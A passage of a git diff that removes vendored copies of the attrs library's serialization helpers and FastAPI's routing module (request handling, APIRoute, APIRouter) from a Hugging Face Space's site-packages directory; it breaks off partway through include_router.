elif isinstance(v, (tuple, list, set, frozenset)): - cf = v.__class__ if retain_collection_types is True else list - rv[a.name] = cf( - [ - _asdict_anything( - i, - is_key=False, - filter=filter, - dict_factory=dict_factory, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ) - for i in v - ] - ) - elif isinstance(v, dict): - df = dict_factory - rv[a.name] = df( - ( - _asdict_anything( - kk, - is_key=True, - filter=filter, - dict_factory=df, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ), - _asdict_anything( - vv, - is_key=False, - filter=filter, - dict_factory=df, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ), - ) - for kk, vv in v.items() - ) - else: - rv[a.name] = v - else: - rv[a.name] = v - return rv - - -def _asdict_anything( - val, - is_key, - filter, - dict_factory, - retain_collection_types, - value_serializer, -): - """ - ``asdict`` only works on attrs instances, this works on anything. - """ - if getattr(val.__class__, "__attrs_attrs__", None) is not None: - # Attrs class. - rv = asdict( - val, - recurse=True, - filter=filter, - dict_factory=dict_factory, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ) - elif isinstance(val, (tuple, list, set, frozenset)): - if retain_collection_types is True: - cf = val.__class__ - elif is_key: - cf = tuple - else: - cf = list - - rv = cf( - [ - _asdict_anything( - i, - is_key=False, - filter=filter, - dict_factory=dict_factory, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ) - for i in val - ] - ) - elif isinstance(val, dict): - df = dict_factory - rv = df( - ( - _asdict_anything( - kk, - is_key=True, - filter=filter, - dict_factory=df, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ), - _asdict_anything( - vv, - is_key=False, - filter=filter, - dict_factory=df, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ), - ) - for kk, vv in val.items() - ) - else: - rv = val - if value_serializer is not None: - rv = value_serializer(None, None, rv) - - return rv - - -def astuple( - inst, - recurse=True, - filter=None, - tuple_factory=tuple, - retain_collection_types=False, -): - """ - Return the *attrs* attribute values of *inst* as a tuple. - - Optionally recurse into other *attrs*-decorated classes. - - :param inst: Instance of an *attrs*-decorated class. - :param bool recurse: Recurse into classes that are also - *attrs*-decorated. - :param callable filter: A callable whose return code determines whether an - attribute or element is included (``True``) or dropped (``False``). Is - called with the `attrs.Attribute` as the first argument and the - value as the second argument. - :param callable tuple_factory: A callable to produce tuples from. For - example, to produce lists instead of tuples. - :param bool retain_collection_types: Do not convert to ``list`` - or ``dict`` when encountering an attribute which type is - ``tuple``, ``dict`` or ``set``. Only meaningful if ``recurse`` is - ``True``. - - :rtype: return type of *tuple_factory* - - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class. - - .. versionadded:: 16.2.0 - """ - attrs = fields(inst.__class__) - rv = [] - retain = retain_collection_types # Very long. :/ - for a in attrs: - v = getattr(inst, a.name) - if filter is not None and not filter(a, v): - continue - if recurse is True: - if has(v.__class__): - rv.append( - astuple( - v, - recurse=True, - filter=filter, - tuple_factory=tuple_factory, - retain_collection_types=retain, - ) - ) - elif isinstance(v, (tuple, list, set, frozenset)): - cf = v.__class__ if retain is True else list - rv.append( - cf( - [ - astuple( - j, - recurse=True, - filter=filter, - tuple_factory=tuple_factory, - retain_collection_types=retain, - ) - if has(j.__class__) - else j - for j in v - ] - ) - ) - elif isinstance(v, dict): - df = v.__class__ if retain is True else dict - rv.append( - df( - ( - astuple( - kk, - tuple_factory=tuple_factory, - retain_collection_types=retain, - ) - if has(kk.__class__) - else kk, - astuple( - vv, - tuple_factory=tuple_factory, - retain_collection_types=retain, - ) - if has(vv.__class__) - else vv, - ) - for kk, vv in v.items() - ) - ) - else: - rv.append(v) - else: - rv.append(v) - - return rv if tuple_factory is list else tuple_factory(rv) - - -def has(cls): - """ - Check whether *cls* is a class with *attrs* attributes. - - :param type cls: Class to introspect. - :raise TypeError: If *cls* is not a class. - - :rtype: bool - """ - attrs = getattr(cls, "__attrs_attrs__", None) - if attrs is not None: - return True - - # No attrs, maybe it's a specialized generic (A[str])? - generic_base = get_generic_base(cls) - if generic_base is not None: - generic_attrs = getattr(generic_base, "__attrs_attrs__", None) - if generic_attrs is not None: - # Stick it on here for speed next time. - cls.__attrs_attrs__ = generic_attrs - return generic_attrs is not None - return False - - -def assoc(inst, **changes): - """ - Copy *inst* and apply *changes*. - - This is different from `evolve` that applies the changes to the arguments - that create the new instance. - - `evolve`'s behavior is preferable, but there are `edge cases`_ where it - doesn't work. Therefore `assoc` is deprecated, but will not be removed. - - .. _`edge cases`: https://github.com/python-attrs/attrs/issues/251 - - :param inst: Instance of a class with *attrs* attributes. - :param changes: Keyword changes in the new copy. - - :return: A copy of inst with *changes* incorporated. - - :raise attrs.exceptions.AttrsAttributeNotFoundError: If *attr_name* - couldn't be found on *cls*. - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class. - - .. deprecated:: 17.1.0 - Use `attrs.evolve` instead if you can. - This function will not be removed du to the slightly different approach - compared to `attrs.evolve`. - """ - new = copy.copy(inst) - attrs = fields(inst.__class__) - for k, v in changes.items(): - a = getattr(attrs, k, NOTHING) - if a is NOTHING: - raise AttrsAttributeNotFoundError( - f"{k} is not an attrs attribute on {new.__class__}." - ) - _obj_setattr(new, k, v) - return new - - -def evolve(*args, **changes): - """ - Create a new instance, based on the first positional argument with - *changes* applied. - - :param inst: Instance of a class with *attrs* attributes. - :param changes: Keyword changes in the new copy. - - :return: A copy of inst with *changes* incorporated. - - :raise TypeError: If *attr_name* couldn't be found in the class - ``__init__``. - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class. - - .. versionadded:: 17.1.0 - .. deprecated:: 23.1.0 - It is now deprecated to pass the instance using the keyword argument - *inst*. It will raise a warning until at least April 2024, after which - it will become an error. Always pass the instance as a positional - argument. - """ - # Try to get instance by positional argument first. - # Use changes otherwise and warn it'll break. - if args: - try: - (inst,) = args - except ValueError: - raise TypeError( - f"evolve() takes 1 positional argument, but {len(args)} " - "were given" - ) from None - else: - try: - inst = changes.pop("inst") - except KeyError: - raise TypeError( - "evolve() missing 1 required positional argument: 'inst'" - ) from None - - import warnings - - warnings.warn( - "Passing the instance per keyword argument is deprecated and " - "will stop working in, or after, April 2024.", - DeprecationWarning, - stacklevel=2, - ) - - cls = inst.__class__ - attrs = fields(cls) - for a in attrs: - if not a.init: - continue - attr_name = a.name # To deal with private attributes. - init_name = a.alias - if init_name not in changes: - changes[init_name] = getattr(inst, attr_name) - - return cls(**changes) - - -def resolve_types( - cls, globalns=None, localns=None, attribs=None, include_extras=True -): - """ - Resolve any strings and forward annotations in type annotations. - - This is only required if you need concrete types in `Attribute`'s *type* - field. In other words, you don't need to resolve your types if you only - use them for static type checking. - - With no arguments, names will be looked up in the module in which the class - was created. If this is not what you want, e.g. if the name only exists - inside a method, you may pass *globalns* or *localns* to specify other - dictionaries in which to look up these names. See the docs of - `typing.get_type_hints` for more details. - - :param type cls: Class to resolve. - :param Optional[dict] globalns: Dictionary containing global variables. - :param Optional[dict] localns: Dictionary containing local variables. - :param Optional[list] attribs: List of attribs for the given class. - This is necessary when calling from inside a ``field_transformer`` - since *cls* is not an *attrs* class yet. - :param bool include_extras: Resolve more accurately, if possible. - Pass ``include_extras`` to ``typing.get_hints``, if supported by the - typing module. On supported Python versions (3.9+), this resolves the - types more accurately. - - :raise TypeError: If *cls* is not a class. - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class and you didn't pass any attribs. - :raise NameError: If types cannot be resolved because of missing variables. - - :returns: *cls* so you can use this function also as a class decorator. - Please note that you have to apply it **after** `attrs.define`. That - means the decorator has to come in the line **before** `attrs.define`. - - .. versionadded:: 20.1.0 - .. versionadded:: 21.1.0 *attribs* - .. versionadded:: 23.1.0 *include_extras* - - """ - # Since calling get_type_hints is expensive we cache whether we've - # done it already. - if getattr(cls, "__attrs_types_resolved__", None) != cls: - import typing - - kwargs = {"globalns": globalns, "localns": localns} - - if PY_3_9_PLUS: - kwargs["include_extras"] = include_extras - - hints = typing.get_type_hints(cls, **kwargs) - for field in fields(cls) if attribs is None else attribs: - if field.name in hints: - # Since fields have been frozen we must work around it. - _obj_setattr(field, "type", hints[field.name]) - # We store the class we resolved so that subclasses know they haven't - # been resolved. - cls.__attrs_types_resolved__ = cls - - # Return the class so you can use it as a decorator too. - return cls diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fastapi/routing.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fastapi/routing.py deleted file mode 100644 index 6efd40ff3bc9fefa964be83d44e10bc60b193fb0..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fastapi/routing.py +++ /dev/null @@ -1,1356 +0,0 @@ -import asyncio -import dataclasses -import email.message -import inspect -import json -from contextlib import AsyncExitStack -from enum import Enum, IntEnum -from typing import ( - Any, - Callable, - Coroutine, - Dict, - List, - Optional, - Sequence, - Set, - Tuple, - Type, - Union, -) - -from fastapi import params -from fastapi._compat import ( - ModelField, - Undefined, - _get_model_config, - _model_dump, - _normalize_errors, - lenient_issubclass, -) -from fastapi.datastructures import Default, DefaultPlaceholder -from fastapi.dependencies.models import Dependant -from fastapi.dependencies.utils import ( - get_body_field, - get_dependant, - get_parameterless_sub_dependant, - get_typed_return_annotation, - solve_dependencies, -) -from fastapi.encoders import jsonable_encoder -from fastapi.exceptions import ( - FastAPIError, - RequestValidationError, - ResponseValidationError, - WebSocketRequestValidationError, -) -from fastapi.types import DecoratedCallable, IncEx -from fastapi.utils import ( - create_cloned_field, - create_response_field, - generate_unique_id, - get_value_or_default, - is_body_allowed_for_status_code, -) -from pydantic import BaseModel -from starlette import routing -from starlette.concurrency import run_in_threadpool -from starlette.exceptions import HTTPException -from starlette.requests import Request -from starlette.responses import JSONResponse, Response -from starlette.routing import ( - BaseRoute, - Match, - compile_path, - get_name, - request_response, - websocket_session, -) -from starlette.routing import Mount as Mount # noqa -from starlette.types import ASGIApp, Lifespan, Scope -from starlette.websockets import WebSocket - - -def _prepare_response_content( - res: Any, - *, - exclude_unset: bool, - exclude_defaults: bool = False, - exclude_none: bool = False, -) -> Any: - if isinstance(res, BaseModel): - read_with_orm_mode = getattr(_get_model_config(res), "read_with_orm_mode", None) - if read_with_orm_mode: - # Let from_orm extract the data from this model instead of converting - # it now to a dict. - # Otherwise there's no way to extract lazy data that requires attribute - # access instead of dict iteration, e.g. lazy relationships. - return res - return _model_dump( - res, - by_alias=True, - exclude_unset=exclude_unset, - exclude_defaults=exclude_defaults, - exclude_none=exclude_none, - ) - elif isinstance(res, list): - return [ - _prepare_response_content( - item, - exclude_unset=exclude_unset, - exclude_defaults=exclude_defaults, - exclude_none=exclude_none, - ) - for item in res - ] - elif isinstance(res, dict): - return { - k: _prepare_response_content( - v, - exclude_unset=exclude_unset, - exclude_defaults=exclude_defaults, - exclude_none=exclude_none, - ) - for k, v in res.items() - } - elif dataclasses.is_dataclass(res): - return dataclasses.asdict(res) - return res - - -async def serialize_response( - *, - field: Optional[ModelField] = None, - response_content: Any, - include: Optional[IncEx] = None, - exclude: Optional[IncEx] = None, - by_alias: bool = True, - exclude_unset: bool = False, - exclude_defaults: bool = False, - exclude_none: bool = False, - is_coroutine: bool = True, -) -> Any: - if field: - errors = [] - if not hasattr(field, "serialize"): - # pydantic v1 - response_content = _prepare_response_content( - response_content, - exclude_unset=exclude_unset, - exclude_defaults=exclude_defaults, - exclude_none=exclude_none, - ) - if is_coroutine: - value, errors_ = field.validate(response_content, {}, loc=("response",)) - else: - value, errors_ = await run_in_threadpool( - field.validate, response_content, {}, loc=("response",) - ) - if isinstance(errors_, list): - errors.extend(errors_) - elif errors_: - errors.append(errors_) - if errors: - raise ResponseValidationError( - errors=_normalize_errors(errors), body=response_content - ) - - if hasattr(field, "serialize"): - return field.serialize( - value, - include=include, - exclude=exclude, - by_alias=by_alias, - exclude_unset=exclude_unset, - exclude_defaults=exclude_defaults, - exclude_none=exclude_none, - ) - - return jsonable_encoder( - value, - include=include, - exclude=exclude, - by_alias=by_alias, - exclude_unset=exclude_unset, - exclude_defaults=exclude_defaults, - exclude_none=exclude_none, - ) - else: - return jsonable_encoder(response_content) - - -async def run_endpoint_function( - *, dependant: Dependant, values: Dict[str, Any], is_coroutine: bool -) -> Any: - # Only called by get_request_handler. Has been split into its own function to - # facilitate profiling endpoints, since inner functions are harder to profile. - assert dependant.call is not None, "dependant.call must be a function" - - if is_coroutine: - return await dependant.call(**values) - else: - return await run_in_threadpool(dependant.call, **values) - - -def get_request_handler( - dependant: Dependant, - body_field: Optional[ModelField] = None, - status_code: Optional[int] = None, - response_class: Union[Type[Response], DefaultPlaceholder] = Default(JSONResponse), - response_field: Optional[ModelField] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - dependency_overrides_provider: Optional[Any] = None, -) -> Callable[[Request], Coroutine[Any, Any, Response]]: - assert dependant.call is not None, "dependant.call must be a function" - is_coroutine = asyncio.iscoroutinefunction(dependant.call) - is_body_form = body_field and isinstance(body_field.field_info, params.Form) - if isinstance(response_class, DefaultPlaceholder): - actual_response_class: Type[Response] = response_class.value - else: - actual_response_class = response_class - - async def app(request: Request) -> Response: - try: - body: Any = None - if body_field: - if is_body_form: - body = await request.form() - stack = request.scope.get("fastapi_astack") - assert isinstance(stack, AsyncExitStack) - stack.push_async_callback(body.close) - else: - body_bytes = await request.body() - if body_bytes: - json_body: Any = Undefined - content_type_value = request.headers.get("content-type") - if not content_type_value: - json_body = await request.json() - else: - message = email.message.Message() - message["content-type"] = content_type_value - if message.get_content_maintype() == "application": - subtype = message.get_content_subtype() - if subtype == "json" or subtype.endswith("+json"): - json_body = await request.json() - if json_body != Undefined: - body = json_body - else: - body = body_bytes - except json.JSONDecodeError as e: - raise RequestValidationError( - [ - { - "type": "json_invalid", - "loc": ("body", e.pos), - "msg": "JSON decode error", - "input": {}, - "ctx": {"error": e.msg}, - } - ], - body=e.doc, - ) from e - except HTTPException: - raise - except Exception as e: - raise HTTPException( - status_code=400, detail="There was an error parsing the body" - ) from e - solved_result = await solve_dependencies( - request=request, - dependant=dependant, - body=body, - dependency_overrides_provider=dependency_overrides_provider, - ) - values, errors, background_tasks, sub_response, _ = solved_result - if errors: - raise RequestValidationError(_normalize_errors(errors), body=body) - else: - raw_response = await run_endpoint_function( - dependant=dependant, values=values, is_coroutine=is_coroutine - ) - - if isinstance(raw_response, Response): - if raw_response.background is None: - raw_response.background = background_tasks - return raw_response - response_args: Dict[str, Any] = {"background": background_tasks} - # If status_code was set, use it, otherwise use the default from the - # response class, in the case of redirect it's 307 - current_status_code = ( - status_code if status_code else sub_response.status_code - ) - if current_status_code is not None: - response_args["status_code"] = current_status_code - if sub_response.status_code: - response_args["status_code"] = sub_response.status_code - content = await serialize_response( - field=response_field, - response_content=raw_response, - include=response_model_include, - exclude=response_model_exclude, - by_alias=response_model_by_alias, - exclude_unset=response_model_exclude_unset, - exclude_defaults=response_model_exclude_defaults, - exclude_none=response_model_exclude_none, - is_coroutine=is_coroutine, - ) - response = actual_response_class(content, **response_args) - if not is_body_allowed_for_status_code(response.status_code): - response.body = b"" - response.headers.raw.extend(sub_response.headers.raw) - return response - - return app - - -def get_websocket_app( - dependant: Dependant, dependency_overrides_provider: Optional[Any] = None -) -> Callable[[WebSocket], Coroutine[Any, Any, Any]]: - async def app(websocket: WebSocket) -> None: - solved_result = await solve_dependencies( - request=websocket, - dependant=dependant, - dependency_overrides_provider=dependency_overrides_provider, - ) - values, errors, _, _2, _3 = solved_result - if errors: - raise WebSocketRequestValidationError(_normalize_errors(errors)) - assert dependant.call is not None, "dependant.call must be a function" - await dependant.call(**values) - - return app - - -class APIWebSocketRoute(routing.WebSocketRoute): - def __init__( - self, - path: str, - endpoint: Callable[..., Any], - *, - name: Optional[str] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - dependency_overrides_provider: Optional[Any] = None, - ) -> None: - self.path = path - self.endpoint = endpoint - self.name = get_name(endpoint) if name is None else name - self.dependencies = list(dependencies or []) - self.path_regex, self.path_format, self.param_convertors = compile_path(path) - self.dependant = get_dependant(path=self.path_format, call=self.endpoint) - for depends in self.dependencies[::-1]: - self.dependant.dependencies.insert( - 0, - get_parameterless_sub_dependant(depends=depends, path=self.path_format), - ) - - self.app = websocket_session( - get_websocket_app( - dependant=self.dependant, - dependency_overrides_provider=dependency_overrides_provider, - ) - ) - - def matches(self, scope: Scope) -> Tuple[Match, Scope]: - match, child_scope = super().matches(scope) - if match != Match.NONE: - child_scope["route"] = self - return match, child_scope - - -class APIRoute(routing.Route): - def __init__( - self, - path: str, - endpoint: Callable[..., Any], - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - name: Optional[str] = None, - methods: Optional[Union[Set[str], List[str]]] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Union[Type[Response], DefaultPlaceholder] = Default( - JSONResponse - ), - dependency_overrides_provider: Optional[Any] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Union[ - Callable[["APIRoute"], str], DefaultPlaceholder - ] = Default(generate_unique_id), - ) -> None: - self.path = path - self.endpoint = endpoint - if isinstance(response_model, DefaultPlaceholder): - return_annotation = get_typed_return_annotation(endpoint) - if lenient_issubclass(return_annotation, Response): - response_model = None - else: - response_model = return_annotation - self.response_model = response_model - self.summary = summary - self.response_description = response_description - self.deprecated = deprecated - self.operation_id = operation_id - self.response_model_include = response_model_include - self.response_model_exclude = response_model_exclude - self.response_model_by_alias = response_model_by_alias - self.response_model_exclude_unset = response_model_exclude_unset - self.response_model_exclude_defaults = response_model_exclude_defaults - self.response_model_exclude_none = response_model_exclude_none - self.include_in_schema = include_in_schema - self.response_class = response_class - self.dependency_overrides_provider = dependency_overrides_provider - self.callbacks = callbacks - self.openapi_extra = openapi_extra - self.generate_unique_id_function = generate_unique_id_function - self.tags = tags or [] - self.responses = responses or {} - self.name = get_name(endpoint) if name is None else name - self.path_regex, self.path_format, self.param_convertors = compile_path(path) - if methods is None: - methods = ["GET"] - self.methods: Set[str] = {method.upper() for method in methods} - if isinstance(generate_unique_id_function, DefaultPlaceholder): - current_generate_unique_id: Callable[ - ["APIRoute"], str - ] = generate_unique_id_function.value - else: - current_generate_unique_id = generate_unique_id_function - self.unique_id = self.operation_id or current_generate_unique_id(self) - # normalize enums e.g. http.HTTPStatus - if isinstance(status_code, IntEnum): - status_code = int(status_code) - self.status_code = status_code - if self.response_model: - assert is_body_allowed_for_status_code( - status_code - ), f"Status code {status_code} must not have a response body" - response_name = "Response_" + self.unique_id - self.response_field = create_response_field( - name=response_name, - type_=self.response_model, - mode="serialization", - ) - # Create a clone of the field, so that a Pydantic submodel is not returned - # as is just because it's an instance of a subclass of a more limited class - # e.g. UserInDB (containing hashed_password) could be a subclass of User - # that doesn't have the hashed_password. But because it's a subclass, it - # would pass the validation and be returned as is. - # By being a new field, no inheritance will be passed as is. A new model - # will be always created. - # TODO: remove when deprecating Pydantic v1 - self.secure_cloned_response_field: Optional[ - ModelField - ] = create_cloned_field(self.response_field) - else: - self.response_field = None # type: ignore - self.secure_cloned_response_field = None - self.dependencies = list(dependencies or []) - self.description = description or inspect.cleandoc(self.endpoint.__doc__ or "") - # if a "form feed" character (page break) is found in the description text, - # truncate description text to the content preceding the first "form feed" - self.description = self.description.split("\f")[0].strip() - response_fields = {} - for additional_status_code, response in self.responses.items(): - assert isinstance(response, dict), "An additional response must be a dict" - model = response.get("model") - if model: - assert is_body_allowed_for_status_code( - additional_status_code - ), f"Status code {additional_status_code} must not have a response body" - response_name = f"Response_{additional_status_code}_{self.unique_id}" - response_field = create_response_field(name=response_name, type_=model) - response_fields[additional_status_code] = response_field - if response_fields: - self.response_fields: Dict[Union[int, str], ModelField] = response_fields - else: - self.response_fields = {} - - assert callable(endpoint), "An endpoint must be a callable" - self.dependant = get_dependant(path=self.path_format, call=self.endpoint) - for depends in self.dependencies[::-1]: - self.dependant.dependencies.insert( - 0, - get_parameterless_sub_dependant(depends=depends, path=self.path_format), - ) - self.body_field = get_body_field(dependant=self.dependant, name=self.unique_id) - self.app = request_response(self.get_route_handler()) - - def get_route_handler(self) -> Callable[[Request], Coroutine[Any, Any, Response]]: - return get_request_handler( - dependant=self.dependant, - body_field=self.body_field, - status_code=self.status_code, - response_class=self.response_class, - response_field=self.secure_cloned_response_field, - response_model_include=self.response_model_include, - response_model_exclude=self.response_model_exclude, - response_model_by_alias=self.response_model_by_alias, - response_model_exclude_unset=self.response_model_exclude_unset, - response_model_exclude_defaults=self.response_model_exclude_defaults, - response_model_exclude_none=self.response_model_exclude_none, - dependency_overrides_provider=self.dependency_overrides_provider, - ) - - def matches(self, scope: Scope) -> Tuple[Match, Scope]: - match, child_scope = super().matches(scope) - if match != Match.NONE: - child_scope["route"] = self - return match, child_scope - - -class APIRouter(routing.Router): - def __init__( - self, - *, - prefix: str = "", - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - default_response_class: Type[Response] = Default(JSONResponse), - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - callbacks: Optional[List[BaseRoute]] = None, - routes: Optional[List[routing.BaseRoute]] = None, - redirect_slashes: bool = True, - default: Optional[ASGIApp] = None, - dependency_overrides_provider: Optional[Any] = None, - route_class: Type[APIRoute] = APIRoute, - on_startup: Optional[Sequence[Callable[[], Any]]] = None, - on_shutdown: Optional[Sequence[Callable[[], Any]]] = None, - # the generic to Lifespan[AppType] is the type of the top level application - # which the router cannot know statically, so we use typing.Any - lifespan: Optional[Lifespan[Any]] = None, - deprecated: Optional[bool] = None, - include_in_schema: bool = True, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> None: - super().__init__( - routes=routes, - redirect_slashes=redirect_slashes, - default=default, - on_startup=on_startup, - on_shutdown=on_shutdown, - lifespan=lifespan, - ) - if prefix: - assert prefix.startswith("/"), "A path prefix must start with '/'" - assert not prefix.endswith( - "/" - ), "A path prefix must not end with '/', as the routes will start with '/'" - self.prefix = prefix - self.tags: List[Union[str, Enum]] = tags or [] - self.dependencies = list(dependencies or []) - self.deprecated = deprecated - self.include_in_schema = include_in_schema - self.responses = responses or {} - self.callbacks = callbacks or [] - self.dependency_overrides_provider = dependency_overrides_provider - self.route_class = route_class - self.default_response_class = default_response_class - self.generate_unique_id_function = generate_unique_id_function - - def route( - self, - path: str, - methods: Optional[List[str]] = None, - name: Optional[str] = None, - include_in_schema: bool = True, - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - def decorator(func: DecoratedCallable) -> DecoratedCallable: - self.add_route( - path, - func, - methods=methods, - name=name, - include_in_schema=include_in_schema, - ) - return func - - return decorator - - def add_api_route( - self, - path: str, - endpoint: Callable[..., Any], - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - methods: Optional[Union[Set[str], List[str]]] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Union[Type[Response], DefaultPlaceholder] = Default( - JSONResponse - ), - name: Optional[str] = None, - route_class_override: Optional[Type[APIRoute]] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Union[ - Callable[[APIRoute], str], DefaultPlaceholder - ] = Default(generate_unique_id), - ) -> None: - route_class = route_class_override or self.route_class - responses = responses or {} - combined_responses = {**self.responses, **responses} - current_response_class = get_value_or_default( - response_class, self.default_response_class - ) - current_tags = self.tags.copy() - if tags: - current_tags.extend(tags) - current_dependencies = self.dependencies.copy() - if dependencies: - current_dependencies.extend(dependencies) - current_callbacks = self.callbacks.copy() - if callbacks: - current_callbacks.extend(callbacks) - current_generate_unique_id = get_value_or_default( - generate_unique_id_function, self.generate_unique_id_function - ) - route = route_class( - self.prefix + path, - endpoint=endpoint, - response_model=response_model, - status_code=status_code, - tags=current_tags, - dependencies=current_dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=combined_responses, - deprecated=deprecated or self.deprecated, - methods=methods, - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema and self.include_in_schema, - response_class=current_response_class, - name=name, - dependency_overrides_provider=self.dependency_overrides_provider, - callbacks=current_callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=current_generate_unique_id, - ) - self.routes.append(route) - - def api_route( - self, - path: str, - *, - response_model: Any = Default(None), - status_code: Optional[int] = None, - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - summary: Optional[str] = None, - description: Optional[str] = None, - response_description: str = "Successful Response", - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - deprecated: Optional[bool] = None, - methods: Optional[List[str]] = None, - operation_id: Optional[str] = None, - response_model_include: Optional[IncEx] = None, - response_model_exclude: Optional[IncEx] = None, - response_model_by_alias: bool = True, - response_model_exclude_unset: bool = False, - response_model_exclude_defaults: bool = False, - response_model_exclude_none: bool = False, - include_in_schema: bool = True, - response_class: Type[Response] = Default(JSONResponse), - name: Optional[str] = None, - callbacks: Optional[List[BaseRoute]] = None, - openapi_extra: Optional[Dict[str, Any]] = None, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - def decorator(func: DecoratedCallable) -> DecoratedCallable: - self.add_api_route( - path, - func, - response_model=response_model, - status_code=status_code, - tags=tags, - dependencies=dependencies, - summary=summary, - description=description, - response_description=response_description, - responses=responses, - deprecated=deprecated, - methods=methods, - operation_id=operation_id, - response_model_include=response_model_include, - response_model_exclude=response_model_exclude, - response_model_by_alias=response_model_by_alias, - response_model_exclude_unset=response_model_exclude_unset, - response_model_exclude_defaults=response_model_exclude_defaults, - response_model_exclude_none=response_model_exclude_none, - include_in_schema=include_in_schema, - response_class=response_class, - name=name, - callbacks=callbacks, - openapi_extra=openapi_extra, - generate_unique_id_function=generate_unique_id_function, - ) - return func - - return decorator - - def add_api_websocket_route( - self, - path: str, - endpoint: Callable[..., Any], - name: Optional[str] = None, - *, - dependencies: Optional[Sequence[params.Depends]] = None, - ) -> None: - current_dependencies = self.dependencies.copy() - if dependencies: - current_dependencies.extend(dependencies) - - route = APIWebSocketRoute( - self.prefix + path, - endpoint=endpoint, - name=name, - dependencies=current_dependencies, - dependency_overrides_provider=self.dependency_overrides_provider, - ) - self.routes.append(route) - - def websocket( - self, - path: str, - name: Optional[str] = None, - *, - dependencies: Optional[Sequence[params.Depends]] = None, - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - def decorator(func: DecoratedCallable) -> DecoratedCallable: - self.add_api_websocket_route( - path, func, name=name, dependencies=dependencies - ) - return func - - return decorator - - def websocket_route( - self, path: str, name: Union[str, None] = None - ) -> Callable[[DecoratedCallable], DecoratedCallable]: - def decorator(func: DecoratedCallable) -> DecoratedCallable: - self.add_websocket_route(path, func, name=name) - return func - - return decorator - - def include_router( - self, - router: "APIRouter", - *, - prefix: str = "", - tags: Optional[List[Union[str, Enum]]] = None, - dependencies: Optional[Sequence[params.Depends]] = None, - default_response_class: Type[Response] = Default(JSONResponse), - responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None, - callbacks: Optional[List[BaseRoute]] = None, - deprecated: Optional[bool] = None, - include_in_schema: bool = True, - generate_unique_id_function: Callable[[APIRoute], str] = Default( - generate_unique_id - ), - ) -> None: - if prefix: - assert prefix.startswith("/"), "A path prefix must start with '/'" - assert not prefix.endswith( - "/" - ), "A path prefix must not end with '/', as the routes will start with '/'" - else: - for r in router.routes: - path = getattr(r, "path") # noqa: B009 - name = getattr(r, "name", "unknown") - if path is not None and not path: - raise FastAPIError( - f"Prefix and path cannot be both empty (path operation: {name})" - ) - if responses is None: - responses = {} - for route in router.routes: - if isinstance(route, APIRoute): - combined_responses = {**responses, **route.responses} - use_response_class = get_value_or_default( - route.response_class, - router.default_response_class, - default_response_class, - self.default_response_class, - ) - current_tags = [] - if tags: - current_tags.extend(tags) - if route.tags: - current_tags.extend(route.tags) - current_dependencies: List[params.Depends] = [] - if dependencies: - current_dependencies.extend(dependencies) - if route.dependencies: - current_dependencies.extend(route.dependencies) - current_callbacks = [] - if callbacks: - current_callbacks.extend(callbacks) - if route.callbacks: - 